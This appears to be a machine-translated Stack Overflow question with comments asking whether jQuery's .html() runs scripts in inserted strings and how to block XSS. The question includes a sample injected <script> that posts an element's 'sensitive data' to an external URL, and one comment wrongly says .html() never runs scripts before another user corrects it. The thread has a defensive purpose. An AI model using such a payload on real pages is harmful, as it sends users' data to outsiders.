可能重复:
html() vs innerHTML jquery/javascript & XSS attacks是jQuery.html()危险吗?
是jQuery.html()危险吗?
$("#id").html("<span>"+ variable + "</span>");
就像上面的例子中,如果变量将具有以下值:
"<script> $.post("external_url.php", {sesitivedata= $("#someElement").text()}, function() {}) </script>"
请问脚本来执行?如果有,有什么办法让变量包含正常的html标签,但不包含脚本?
编辑:添加脚本标记字符串
你试过了吗?发生了什么? – epascarello 2012-08-17 16:51:24
'$ .html()'不执行'eval'。 'eval'是触发脚本执行所必需的。 – Ohgodwhy 2012-08-17 16:51:54
@Ohgodwhy你是错的。这很容易测试。打开你的开发者控制台并执行'$('body div:last')。html($(“”));' – meagar 2012-08-17 17:01:50